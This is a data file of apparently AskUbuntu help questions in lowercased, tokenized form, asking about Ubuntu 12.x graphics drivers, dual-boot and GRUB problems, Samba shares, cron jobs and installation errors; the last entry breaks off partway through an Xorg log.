271426	savage s3 and lubuntu ( or any flavour ) 12.10 big issue	please be nice with me : i spent all the night with it and i 'm exausted . i 've got an old acer aspire1300 15 '' ( 512+256ram and 1.3 mhz cpu ) . i tried all night installing lubuntu , xubuntu.. lspci -k reports `` s3 inc. vt 8636a [ prosavage kn133 ] agp4x vga controller ( twisterk ) ( rev 01 ) after the install ( only possible in alternate-install ) there is no way to get a working image on linux.. what could i do ? i 'm really desperate . now there is lubuntu 12.10 on it . ca n't access to terminal either ( is there any option to do it ? ) ... i 'm tired and sad . edit & resume : this seem to be a bug , as confirmed on various websites , related to ubuntu 12.10 . uploading from 12.04 ( where it works , as it seems ) to 12.10 makes videocard not working , and fixing xorg does n't seem to solve the problem . very big bug , though . public bug reported : i have a laptop acer aspire 1300 , running lubuntu since 10.x . some years , already . everything worked fine . the problem came after upgrading from lubuntu 12.04 ( in which display still worked correctly ) to 12.10 . after that , the laptop boots up correctly , but when it boots the display manager ( lightdm ) then the screen distorts completely . only the upper thrid is more or less correctly displayed . the graphics card is an s3 vt8363a prosavage kn 133 ( agp4x vga controller ) , as reported by lspci . modifying xorg.conf does not help . changing the display manager ( from lightdm to lxdm ) does not help , as well . i tried with `` sudo modprobe savage '' ( since savage does not appear with '' lsmod '' ) , stopping and starting the display manager . but that did not work . also , it appears that the module is not kept after rebooting . any ideas ? ** affects : xserver-xorg-video-savage ( ubuntu ) importance : undecided status : new links related ( nothing solved , as far as i ( poorly ) understand ) : https : //bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-savage/+bug/1098661 https : //bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-savage/+bug/1110905
271429	ubuntu 12.04 + intel gpu : random freezes	i have a thinkpad t420 with intel graphics , and an external monitor through displayport . i was running 12.10 with no problems , but 2 days ago , after an update , my system started to crash with no reason . well , i was already planning to come back to 12.04 lts , so i did it a few hours ago . after a clean install and updates , i got the same random crashes . this guy seems to have the same problem i 'm facing . is there anything i can do to help fixing this issue ?
271430	how to run a cron entry periodically ?	i have a line of script that works through terminal and works through cron to run one time : it downloads a file from the internet and saves it in a specific place named as the date it was found : cd /media/path/to/folder & & wget `` http : //www.web/address/name.gif '' & & mv name.gif `` $ ( date + ' % y_ % m_ % d_t % h % m ' ) '' i put this together one bit at a time , as i 'm new to ubuntu , then put it together in terminal , then ran it successfully as a one time task , entered in the `` scheduled tasks '' window . when i add it through cron with crontab -e to run on the first minute of every hour as : 1 * * * * cd ... it ran once but did n't repeat . when i open it in `` scheduled tasks '' it says : your command contains one or more of the character % , this is special for cron and can not be used with gnome-schedule ... . i do n't understand this error , since i can use the same script with the one-time task in scheduled tasks without problem . any advice on the script error ? knowledge of why it wo n't repeat ? simplifications to script ? thanks for the help !
271435	deleted ubuntu partition and now i get grub rescue	i am dual booting with win8 and deleted the partition from it . after restarting i get the grub rescue prompt i tried to run ubuntu off of a flashdrive and supergrub2 but neither worked and it went right back to rescue grub
271436	how to boot a laptop from a dvd ?	just got a lenovo laptop with free dos installed on it . i followed instructions on ubuntu site and downloaded ubuntu-12.04.2-desktop-i386.iso file . i did burn the same to a dvd and trying to boot which is not happening . any help regarding the same is greatly appreciated .
271438	ubuntu touch on sony xperia p	i would like some help or guidance to port/install ubuntu touch on my phone . so far i have my hw files and the original kernel from sony for my phone . i am aware that ubuntu touch is based on cm 10-1 . is it possible for me to modify my kernel and cm 9 for my xperia p with the cm 10-1 files ? if so how would i go about that ? any suggestions ?
271439	failed to load the package list ; unable to parse package file /var/lib/apt/lists	i 'm unable to update or upgrade due to the below error : e : unable to parse package file /var/lib/apt/lists/id.archive.ubuntu.com_ubuntu_dists_quantal_main_i18n_translation-en ( 1 ) , e : the package lists or status file could not be parsed or opened . can anyone help ?
271443	printer not browseable by samba	i have added a samba printer . but it is not browseable , please find the following samba configuration , # # # # # # # # # # # # # # # global definitions # # # # # # # # # # # # [ global ] workgroup = workgroup server string = samba file server security = user valid users = @ smbgrp deadtime = 10 time server = yes log level = 3 log file = /var/log/samba/ % m . log max log size = 50 socket options = so_keepalive iptos_lowdelay tcp_nodelay so_rcvbuf=8192 so_sndbuf=8192 os level = 255 domain master = no dns proxy = no kernel oplocks = no printcap name = /run/cups/printcap printing = cups create mask = 0644 directory mask = 0755 hosts allow = xx.xx.xx. , xx.xx.xx . hosts deny = all cups options = raw veto files = /.recycle/ , /thumbs.db/ guest account = nobody # # # # # # # # # # # # # # # share definitions # # # # # # # # # # # # # # # # # # [ print $ ] comment = printer drivers path = /var/lib/samba/printers browseable = yes read only = yes guest ok = no [ printers ] comment = all printers path = /var/spool/samba browseable = yes printable = yes read only = no # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # but testparm -s result is showing browseable = no . am using ubuntu 12.10 how do i fix it ?
271447	files on usb drive containing ubuntu	i have ubuntu installed on a usb drive , along with other files . is there any way i can access the other files from within ubuntu ? i can mount other devices like my hard disk and my dvd , but i ca n't see any way to get at the other files on the usb drive .
271457	start ppp ( mobile broadband ) connection automatically when eth0 gets down	i am having a two connection . one is local area ethernet connection which connects to internet . second connection is a gsm modem connected to my modem . what i am looking for is , when eth0 ( local network ) is down , start automatically ppp connection when eth0 is up , turn off automatically ppp connection . so in a way i am looking for continous internet connect and priority is through eth0 ( local area network ) i believe this can be done by editing /etc/network/interfaces file . but i do n't know exactly what to do . i can configure my modem based ppp connection using pon/poff command .
271463	is `` chmod -r o+x /home '' dangerous ?	i 'm very new to ubuntu . during work on my home pc , i accidentally made the following command : sudo chmod -r o+x /home i want to know if it 's dangerous to open access for other users and , if so , how can i revert it ?
271467	how to dual boot the ubuntu and windows 7 again ? ( after install ubuntu )	i have problem with dual booting windows and ubuntu ... i had windows 7 then i installed ubuntu 12.4. ubuntu installed side by side windows and everything worked just fine.. then i decide to install ubuntu 12.10. i did n't upgrade it from update manager . i reinstalled it from boot.and in the installation i chose ( something else ) ... and i deleted swap and root and boot partition and recreate all of it . after install , windows does not come up . i dont know how bring it up . is there software like easy bcd for ubuntu ? i want my windows 7 back.i want both of them side by side like before .
271469	installing ubuntu on a non activated version of windows	my version of windows 8 is n't activated and i want to install ubuntu , from a usb-stick . when i 'm in the install setup it asks me to select my operating system , but i do n't have one , so it says it will clear the whole drive . what exactly does that mean ?
271470	ubuntu 12.04 installer ca n't detect my on-board network interface	currently installing ubuntu 12.04.2 server and i get an error saying it ca n't detect my network interface device . my board is gigabyte z77mx-d3h-th . the installer allows me to continue though . is there a way to resolve this later on ? i tried googling the issue but could n't find anything substantial . thanks .
271471	selecting a [ long ] part of text in evince	i want to select a long part of text , say from starting of page 200 to end of page 400 in evice . how can i do this most quickly ?
271476	my touchpad is not responding on an acer aspire e1-471-6650	i recently bought an acer aspire e1-471-6650 and i already have problems . first , when i tried to use the touchpad on a livecd , it was n't responding . when i installed it in my notebook , it was n't responding either . i was browsing for solutions and i could n't find a solution for it . when i write xinput command : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=13 [ slave pointer ( 2 ) ] ⎜ ↳ optical mouse id=11 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ hd webcam id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] ↳ acer wmi hotkeys id=14 [ slave keyboard ( 3 ) ] with dpkg -l xserver-xorg-input-synaptics nombre : xserver-xorg-input-synaptics versión :1.6.2-1ubuntu5 arquitectura : i386 descripción : synaptics touchpad driver for x.org server with cat /proc/bus/input/devices ... i : bus=0011 vendor=0002 product=0007 version=01b1 n : name= '' synps/2 synaptics touchpad '' p : phys=isa0060/serio2/input0 s : sysfs=/devices/platform/i8042/serio2/input/input9 u : uniq= h : handlers=mouse1 event9 b : prop=9 b : ev=b b : key=6420 0 30000 0 0 0 0 0 0 0 0 b : abs=2608000 11000003 ... i tested these solutions : i was able to enable/disable this with fn+f7 i wrote in final of paragraph of sudo nano /usr/share/x11/xorg.conf.d/50-synaptics.conf section `` inputclass '' identifier `` touchpad catchall '' driver `` synaptics '' matchistouchpad `` on '' option `` tapbutton1 '' `` 1 '' option `` vertedgescroll '' `` 1 '' endsection can somebody help me ? .. thanks !
271478	non-graphical tty 's not stretching full screensize	on tty7 ( graphical environment ) nothing 's wrong , i can enjoy the whole pixels of my screen which is the main thing . but here 's something a bit annoying , when i switch on terminals from 1 to 6 , the visual space is shrunk to get into the upper left corner of my screen leaving the rest unused . worth a million words : how can i fix that ? update : here 's an shot of my screen
271479	beginning installation trouble	i 'm trying to install wubi 12.10 for my windows 7 64-bit computer . i am able to save the executable , and once i do so the window asking for my permission to continue pops up . i press 'continue ' and then nothing happens . why is n't the installation process proceeding as described ? thanks for the help !
271480	window 8 and ubuntu 12.04	i have a lenovo ideapad laptop . i installed ubuntu 12.04 along with windows 7 using wubi . now i have upgraded to windows 8 . in the boot menu , it 's not showing the ubuntu os , even when i have disabled the fast booting option from the windows 8 boot menu . please help me
271481	13.04 : which version to install and when ?	i 'll soon get a new notebook with an intel core i7 ( 3rd gen ) processor . i would like to install 64bit ubuntu 13.04 on the notebook and have the following questions : would one choose to install the `` pc ( intel x86 ) desktop image '' or `` 64-bit pc ( amd 64 ) desktop image '' ( see http : //cdimage.ubuntu.com/daily-live/current/ ) ? . as far as i know , only the latter is 64bit . is that true ? [ i 'm asking since only the former says 'intel ' while only the latter says '64bit ' , so i 'm not sure which is the right one in my case . ] apart from bugs ... is there any problem in installing 13.04 now ( a month before the official release ) ? do i get the 'official version ' then automatically by upgrading [ sudo apt-get dist-upgrade ] ? [ i would n't install it now if i had to reinstall it in a month to get 13.04 ]
271485	installing windows 8 on xps 13 developer edition	i am considering buying the xps 13 developer edition , but i need a program a program there is only available on windows . so i wan na hear if anyone knows if it 's possbile to install windows along side ubuntu on it , now when it comes pre isntalled with ubuntu ? thanks for your time
271497	how to access windows system on lan	i have a wireless access point which is connected to internet and the same being accessing by 2 system , one on windows xp and the other on ubuntu . please let me know if it is possible to access the c : \ d : \ or any drives on windows xp machine directly from ubuntu system ? i have tried doing this with 2 windows xp system but not sure how to do this from ubuntu . any help regarding the same is highly appreciated . ( reason to do so is to access files in windows xp machine ) -thanks & regards , manju
271499	12.04 installation failure - > failed to boot - > system showing grub rescue	i had initially installed 12.10 for some project related scim-m17n . unfortunately scim-m17n was not working ( raised in askubutu too ) . i was advised by my client to install 12.04 where this is working perfectly . i chose the option for erasing 12.10 and install 12.04 . installation was going smooth until it suddenly stopped saying some problem in cd . since then machine is going to grub rescue prompt - i am unable to boot even in windows . i have tried those set prefix , root steps but it is unable to recognize boot command . can someone please advise me urgently how to boot the machine in windows at least .
271504	customizing samba file server	i customized samba , but now one computer does n't see new ubuntu in network . in smb.conf , i appended this : [ develop ] comment = develop file storage path = /develop browsable = yes read only = no guest ok = no write list = technobulka create mask = 0755 workgroup and secure do n't change . computers in network are : notebook ubuntu 12.04 - it 's visible for all notebook windows 7 - visible too pc ubuntu 12.04 with share - do n't visible when i customize this pc last week all works fine , but now i do n't know what happens . update after installing system-config-samba and restarting the pc i can see it in every computer . system-config-samba changed smb.conf like this : [ develop ] comment = develop file storage path = /develop ; browsable = yes writable = yes create mask = 0755 valid users = technobulka i can connect to the folder but ca n't create file or folder . what i must change ?
271506	how to disable application window previews rotation in unity 3d ?	i 'm using ubuntu 12.04 with 3d unity . when i have several windows of the same application ( say nautilus ) opened and i click on its launcher ( in unity app launcher bar ) window previews appear offering me to select which window i want to activate . but sometimes i ca n't recognize for sure which one i needed by those previews . so i 'm clicking one of them . if wrong window is activated i 'm clicking the launcher again , and trying next window . but then i found that those previews changed their positions ( rotated ) . so i ca n't predict those window order to iterate them all without repetition . i would like to disable that `` windows preview rotation '' feature . is it possible ?
271511	access to usr/local/bin	my question is this . i have a jar file that i want to be able to run from command line with a simple command . so in my ~/.bashrc file i created an alias like so : alias selenium='java -jar selenium-server-standalone-2.31.0.jar' the jar file is in here : /usr/local/bin and i have /usr/local/bin in my path variable . my understanding is that because it is in my path variable i can run it from anywhere , however if i open a terminal and type : selenium i get this : error : unable to access jarfile selenium-server-standalone-2.31.0.jar so the alias is working , but it cant access the file . if i change directory to /usr/local/bin and type selenium again it works any reason why i ca n't run this from anywhere ? also , what is the purpose of /usr/local/bin folder . is this where i should put programs i want to run ? thanks
271513	lxde is not starting after upgrading to 3.5.0-26-generic kernel	i 've upgraded my lubuntu distribution to the 3.5.0-26-generic kernel and after rebooting , lxde is not starting up anymore . i had to revert to 3.5.0-25-generic , which still works . any suggestions on how can i fix the problem ? thanks in advance .
271514	how do i stop my pc from autoplaying media files present on my sd card on my android phone ?	how do i stop my pc from autoplaying media files present on my sd card on my android phone ? whenever my usb linkage cord between my pc and my phone is wobbled just a little bit my ubuntu 12.10 tries to play all the files on my sd card ( like audio and picture files ) how do i stop this ?
271515	dual boot windows 7 & ubuntu 12.10 . managed to boot in win7 but not in ubuntu	http : //paste2.org/p/3270871 hi all , thanks in advance . because i know people over there is very knowledgeable and able to help me out . i just started to use my first linux based operating system as ubuntu 12.10 . as its new for me i require working os of windows to do some work also . i had windows 7 and i installed ubuntu from cd . first i make mistake and make my windows 7 partition to have mbr records instead of whole harddisk . thus after that i did it again with installing the same to a harddisk . but at that time my windows partition was not working . i managed to start it again by `` bootrec /fixmbr & fixboot '' command . curretly i am able to open windows 7 but not ubuntu . i tried auto repair of `` boot-repair '' but not succeed . i am also attaching details of my system created by bootrepair . please look in to it and help me out . i am available here only to sort out as soon as possible . so will give you updates as soon as possible . waiting for your reply . thanks again .
271516	is there a program to mount all of my drives automatically ?	sometimes when i restart my computer , my drives will mount but sometimes they wo n't ( like right now when i 'm typing this question out ) . is there an easy way , like a program that can mount them for me ? going in the console , making folders , etc , is not what i want . i like how windows does it where they always mount the drives no matter what . if there is n't a program how else can i easily mount all drives ?
271518	is there any xbmc remote control for ubuntu ?	i have a raspberry pi running raspbmc ( xbmc ) connected to the home network . is there any xbmc remote control application i can use on my ubuntu notebook to control the raspbmc ( xbmc ) ?
271520	how can i list the files in other ( non-current ) directory ?	if ls lists the content of the current directory , is there a similar command that list the content of a non current directory , without using cd ?
271525	wubi installation error !	every time i attempt to install wubi i get an error and i 'm therefore unable to install ubuntu . there error that i get is the following : bluetooth : ca n't change to loading configuration err i am not sure why it is happening as i installed ( and then later deleted ) older version of ubuntu just 5 months ago . it all worked fine and dandy , but now it is failing . also , the os from which i 'm trying to install is windows 7 64-bit . does anyone have any suggestions ? p.s . i did attempt to install it multiple times , and it happens every time i attempt to . thanks in advance = ) my specs : intel core i7 2670qm intel hd 3000 and nvidia 525m 8 gb of ram 500gb hdd version of ubuntu that i 'm trying to install : 12.10
271538	not getting dual boot grub menu ubuntu12.04.2 64 bit with pre-installed windows7 64-bit	i have pre-installed windows 7 64 bit on lenovo g580 and then i want to install ubuntu 12.04.2 64 bit for android sourcecode compilation . while installing windows i partitioned hd into 3 drives c-100 gb d-197 gb g-176gb . i installed ubuntu on d drive with `` something else '' option after successfully installed ubuntu 12.04.2 finally it will ask restart . here it 's come problem instead of showing dual boot menu windows starting ... . could you please suggest me .. how to get dual boot menu to choose which opearting system to start ... can anyone tell me how to check whether my laptop supports 64 bit or not ? then i tried installing ubuntu 12.04.2 using vmware here i am getting the following errors : a dialog with message : binary translation is incompatible with long mode on this platform . disabling long mode . without long mode support , the virtual machine will not be able to run 64-bit code . for more details see http : //vmware.com/info ? id=152 . after clicking ok button : i got the following error with big red error : this virtual machine is configured for 64-bit guest operating systems . however , 64-bit operation is not possible . this host supports intel vt-x , but intel vt-x is disabled . intel vt-x might be disabled if it has been disabled in the bios/firmware settings or the host has not been power-cycled since changing this setting . 1 . verify that the bios/firmware settings enable intel vt-x and disable 'trusted execution . ' 2 . power-cycle the host if either of these bios/firmware settings have been changed . 3 . power-cycle the host if you have not done so since installing vmware workstation . 4 . update the host 's bios/firmware to the latest version . for more detailed information , see http : //vmware.com/info ? id=152 . my laptop is a lenovo g580 .
271541	blank screen from resume - can still login	this may be a bug - i am testing ubuntu 13.04 64bit . i have a hp envy extreme xt 13.3 when i suspend and resume , i have a blank screen . however i can still enter my password and then wait a few moments and press either of the screen brightness buttons and the screen wakes up . more information - this pc uses an intel graphics hd 4000 - graphics drive is intel ivybridge mobile
271546	ubuntu 12.10 ibm spss statistics throws java error	i use ubuntu version 12.10 64 bit . after i installed ibm spss statistics v 21.0.0.0 , i get the following java error , when trying to run the program : exception in thread `` main '' java.lang.unsatisfiedlinkerror : awt ( an exception was pending after running jni_onload ) at java.lang.classloader.loadlibrarywithpath ( classloader.java:1018 ) at java.lang.classloader.loadlibrarywithclassloader ( classloader.java:982 ) at java.lang.system.loadlibrary ( system.java:469 ) at sun.security.action.loadlibraryaction.run ( loadlibraryaction.java:69 ) at java.security.accesscontroller.doprivileged ( accesscontroller.java:202 ) at java.awt.toolkit.loadlibraries ( toolkit.java:1606 ) at java.awt.toolkit. < clinit > ( toolkit.java:1628 ) at java.lang.j9vminternals.initializeimpl ( native method ) at java.lang.j9vminternals.initialize ( j9vminternals.java:200 ) at java.awt.awtkeystroke. < clinit > ( awtkeystroke.java:81 ) at java.lang.j9vminternals.initializeimpl ( native method ) at java.lang.j9vminternals.initialize ( j9vminternals.java:200 ) at java.lang.j9vminternals.initialize ( j9vminternals.java:167 ) at com.spss.charteditor.resources.labelsbundle. < clinit > ( unknown source ) at java.lang.j9vminternals.initializeimpl ( native method ) at java.lang.j9vminternals.initialize ( j9vminternals.java:200 ) at com.spss.charteditor.util.resutil.getbundle ( unknown source ) at com.spss.charteditor.util.resutil.setlocale ( unknown source ) at com.spss.java_client.core.common.componentstate.setilanglocale ( unknown source ) at com.spss.java_client.core.common.driver.main ( unknown source ) spss client error : exception thrown by main . java.lang.unsatisfiedlinkerror : awt ( an exception was pending after running jni_onload ) my current java version is : java version `` 1.7.0_15 '' openjdk runtime environment ( icedtea7 2.3.7 ) ( 7u15-2.3.7-0ubuntu1~12.10.1 ) openjdk 64-bit server vm ( build 23.7-b01 , mixed mode )
271553	can i move a virtualbox machine from windows to ubuntu ?	does it work by moving vdi from windows to ubuntu virtualbox folder ?
271556	ubuntu 12.04 : can not accecss internet ( ppp0 ) from virtualbox guest windows 7	i have windows 7 as guest os on my ubuntu 12.04 host through virtualbox . i use dial-up connection ( ppp0 ) through a usb dongle on host machine to access internet . however , when my host is connected to the internet , guest ( windows 7 ) is not able to connect to the internet , either using nat or bridge method in virtualbox . what could be the problem ?
271557	samba . writable for two or more users	have user1 and user2 . they are in usergroup1 . in console run it : sudo chgrp -r usergroup1 /folder lihe this - https : //help.ubuntu.com/12.04/serverguide/samba-fileprint-security.html > share security . in smb.conf [ folder ] comment = folder path = /folder browsable = yes writable = yes guest ok = no write list = user1 , user2 create mask = 0777 but only user2 can create/delete files . i think it because before that i run in console : sudo chown -r user2 /folder how set folder writable for both users ? also i try write list = user1 user2 without a comma . but so does not work . upd i try change owner like this http : //en.wikipedia.org/wiki/chown chown -r : usergroup1 /folder and edit smb.conf like this write list = @ usergroup1 but still both users ca n't add/del file in /folder . upd2 - solution i can cunfig it ! hope it help somebody . smb.conf [ folder ] comment = folder path = /folder browsable = yes writable = yes read only = no create mask = 0770 directiory mask = 0770 valid users = @ usergroup1 and mod for folder chmod 775 /folder
271558	autoconnecting to bluetooth device on startup and autochanging audio output	i use ubuntu 12.10 64 bit . every time i turn my computer on , i have to manually connect to my bluetooth speakers and change audio output to bluetooth device . i 've found this question : autoconnecting bluetooth devices . adding a following line to /etc/pulse/default.pa does n't help . load-module module-switch-on-connect i also installed stream2ip , but it says i do n't have a bluetooth device . is there a way to accomplish this automatization ?
271559	ca n't enlarge swap drive	running ubuntu 12.04 on a toshiba netbook . netbook has like .8 gigs of ram so i 'm trying to offset the crappy ram amount with a larger swap drive . tried to do it from a pretty detailed tutorial , was unable to add or expand swap drive . tried to uninstall & reinstall ubuntu and do it on initial installation but still could not get the swap drive to be any larger then 1061 mb anybody have any idea why ? or what i 'm doing wrong ? you can go ahead and call me a noob , i 'll agree with you , ha .
271560	dhcp can not obtain correct ip sometimes	i installed ubuntu lucid on my thinkpad x201i laptop.recently i found it that when i connect my cable to my laptop in our school 's library , my dhcp client can not obtain correct ip . i have to set it manually to : address : 192.168.0.223 netmask : 255.255.0.0 gateway : 192.168.20.1 dns server : 202.119.32.6 when i run sudo dhclient eth0 , i got the following infomation : internet systems consortium dhcp client v3.1.3 copyright 2004-2009 internet systems consortium . all rights reserved . for info , please visit https : //www.isc.org/software/dhcp/ listening on lpf/eth0/** : ** : ** : ** : ** : ** sending on lpf/eth0/** : ** : ** : ** : ** : ** sending on socket/fallback dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 3 dhcpoffer of 192.168.0.223 from 192.168.20.6 dhcprequest of 192.168.0.223 on eth0 to 255.255.255.255 port 67 dhcpack of 192.168.0.223 from 192.168.20.6 no expiry time on offered lease . dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 6 dhcpoffer of 192.168.0.223 from 192.168.20.6 dhcprequest of 192.168.0.223 on eth0 to 255.255.255.255 port 67 dhcpack of 192.168.0.223 from 192.168.20.6 no expiry time on offered lease . ... the endless loop ... i have to type ctrl+c to stop it . anybody can help me ?
271562	convert a bunch of jpegs to a movie	i have a bunch of non-consecutivly numbered jpegs ( they are in order , but there are gaps in the sequence ) that i want to convert into a movie . when i try using convert , ffmpeg or avconv , it creates large amounts of temporary files , eventually filling my tmp directory and dragging my i7 machine with 16 gigs of ram down into an unresponsive heap . is there a way to do this without using all my memory and filling up my disk ?
271566	how to get ubuntu to display unicode supplementary characters ?	i have a standard desktop ui install of the latest ubuntu distro and i 'm trying to view this page : http : //www.i18nguy.com/unicode/supplementary-test.html however none of the text display properly . i have tested this on windows 8 and i can see them just fine . my locale output is as follows lang=en_us.utf-8language= lc_ctype= '' en_us.utf-8 '' lc_numeric= '' en_us.utf-8 '' lc_time= '' en_us.utf-8 '' lc_collate= '' en_us.utf-8 '' lc_monetary= '' en_us.utf-8 '' lc_messages= '' en_us.utf-8 '' lc_paper= '' en_us.utf-8 '' lc_name= '' en_us.utf-8 '' lc_address= '' en_us.utf-8 '' lc_telephone= '' en_us.utf-8 '' lc_measurement= '' en_us.utf-8 '' lc_identification= '' en_us.utf-8 '' lc_all= i have also found the terminal also does n't display many unicode characters .
271568	`` make install '' errors	i am trying to install vmd on my ubuntu but `` make install '' is giving these errors . can someone help ? these are the errors . thanks for the helps . if [ ! -d `` /usr/local/lib/vmd '' ] ; then \ mkdir -p `` /usr/local/lib/vmd '' ; \ fi ; \ if [ ! -d `` /usr/local/bin '' ] ; then \ mkdir -p `` /usr/local/bin '' ; \ fi ; \ if [ ! -d `` /usr/local/lib/vmd '' /doc ] ; then \ mkdir -p `` /usr/local/lib/vmd '' /doc ; \ fi cp ../announcement `` /usr/local/lib/vmd '' cp : can not create regular file `/usr/local/lib/vmd/announcement ' : permission denied make : [ install ] error 1 ( ignored ) cp ../readme `` /usr/local/lib/vmd '' cp : can not create regular file `/usr/local/lib/vmd/readme ' : permission denied make : [ install ] error 1 ( ignored ) cp ../license `` /usr/local/lib/vmd '' cp : can not create regular file `/usr/local/lib/vmd/license ' : permission denied make : [ install ] error 1 ( ignored ) cp ../doc/ug.pdf `` /usr/local/lib/vmd '' /doc cp : can not create regular file `/usr/local/lib/vmd/doc/ug.pdf ' : permission denied make : [ install ] error 1 ( ignored ) if [ -f /usr/local/lib/vmd/vmd_linuxamd64 ] ; then \ mv -f `` /usr/local/lib/vmd/vmd_linuxamd64 '' `` /usr/local/lib/vmd/old_vmd_linuxamd64 '' ; rm -f `` /usr/local/lib/vmd/old_vmd_linuxamd64 '' ; fi cp ../linuxamd64/vmd_linuxamd64 `` /usr/local/lib/vmd '' cp : can not overwrite directory `/usr/local/lib/vmd/vmd_linuxamd64 ' with non-directory make : [ install ] error 1 ( ignored ) if [ -d `` ../lib/redistrib/lib_linuxamd64 '' ] ; then \ cd ../lib/redistrib/lib_linuxamd64 ; tar -cf - ./* | \ ( cd `` /usr/local/lib/vmd '' ; tar -xf - ) \ fi ; tar : ./libcudart.so.4 : can not open : permission denied tar : ./libexpat.so.0 : can not open : permission denied tar : ./libsqlite3.so.0 : can not open : permission denied tar : exiting with failure status due to previous errors make : *** [ install ] error 2
271578	unable to install ubuntu 12.04 lts 64 bit	i am unable to install 12.04 lts 64 bit on my 64 bit m/c having windows 8 . i have a partition of 95 gb ntfs where i want to install it . i tried the windows installer , but when asked for reboot , it can not reboot . only a beep comes with black screen . i tried the usb installer , but in vain . here i get the home screen to choose options but when i choose either to run or install it , a beep is all that is made and nothing happens . please help me install ubuntu .
271580	trouble with installing daily build geary	i 've been having trouble lately with installing the daily build from geary . first of all , i did the following on my terminal , which would get me the latest daily build . code : sudo apt-add-repository ppa : valateam/ppa sudo apt-add-repository ppa : yorba/daily-build sudo apt-get update & & sudo apt-get geary recently , yorba has released geary 0.3 . but when i installed geary , the about window shows me 0.2.2+ trunk when it should show 0.3 . perhaps , there is an issue with the package management . i ran this on ubuntu 13.04 daily build , which updates fine . i thought by uninstalling geary and installing from scratch would fix the problem , but it does n't seem that straightforward . sudo apt-get purge geary & & apt-get autoremove the code removes the app , but does n't remove any configuration whatsoever . for instance , on a fresh install , my 4 email accounts that i set up were still there . i really wish to run the daily build on my computer , and i do n't want to be stuck with what really is n't 0.2.2+ trunk . how can i troubleshoot this issue and install the daily build ? one solution i have is to reinstall the ubuntu daily build , but i think it 's unnecessary .
271581	how can i open my front camera in 12.10 ?	i 'm using ubuntu 12.10 . i 'm unable to open front camera . how can i open front camera ? tell me from scratch . what packages i have to download ? please guide me . thanks in advance .
271588	module nvidia_173 not found and low graphic mode	for a long time i 've had problems with drivers for my card on linux ( mint , arch , ubuntu ) . when i use `` software sources '' to select the top nvidia driver , i reboot into a low resolution lightdm screen . i can login , but it 's all low res and when i go to system settings - > display , the display is named `` laptop '' and i can only select one resolution . nvidia-settings says i 'm not using the nvidia driver , even after running sudo nvidia-xconfi and rebooting . i read somewhere that i needed to install `` nvidia-173 '' instead , so i uninstalled all other nvidia drivers and installed that . when i rebooted , i get `` the system is running in low-graphics mode '' . the reconfigure option and rebooting does n't do anything . i read that reinstalling ubuntu-desktop should fix this , but it did n't for me . if i switch to tty1 and do startx , i see loading extension glx fatal : module nvidia_173 not found . fatal server error : no screens found my card is a gt320 . edit : output from lspci | grep vga : 01:00.0 vga compatible controller : nvidia corporation gt215 [ geforce gt 320 ] ( rev a2 ) xorg.0.log : [ 404.480 ] x.org x server 1.13.0 release date : 2012-09-05 [ 404.480 ] x protocol version 11 , revision 0 [ 404.480 ] build operating system : linux 3.2.0-32-generic x86_64 ubuntu [ 404.480 ] current operating system : linux matthew-pc 3.5.0-17-generic # 28-ubuntu smp tue oct 9 19:31:23 utc 2012 x86_64 [ 404.480 ] kernel command line : boot_image=/boot/vmlinuz-3.5.0-17-generic root=uuid=278a7dd6-0d6c-46e5-87e4-34a86130220d ro quiet splash vt.handoff=7 [ 404.480 ] build date : 27 november 2012 07:44:35am [ 404.480 ] xorg-server 2:1.13.0-0ubuntu6.1 ( for technical support please see http : //www.ubuntu.com/support ) [ 404.480 ] current version of pixman : 0.26.0 [ 404.480 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 404.480 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 404.480 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : sat mar 23 15:29:20 2013 [ 404.480 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 404.481 ] ( == ) no layout section . using the first screen section . [ 404.481 ] ( == ) no screen section available . using defaults . [ 404.481 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 404.481 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 404.481 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 404.481 ] ( == ) automatically adding devices [ 404.481 ] ( == ) automatically enabling devices [ 404.481 ] ( == ) automatically adding gpu devices [ 404.481 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 404.481 ] entry deleted from font path . [ 404.481 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 404.481 ] entry deleted from font path . [ 404.481 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 404.481 ] entry deleted from font path . [ 404.481 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 404.481 ] entry deleted from font path . [ 404.481 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 404.481 ] entry deleted from font path . [ 404.481 ] ( ww ) the directory `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' does not exist . [ 404.481 ] entry deleted from font path . [ 404.481 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 404.481 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 404.481 ] ( ii ) the server relies on udev to provide the list of input devices . if no 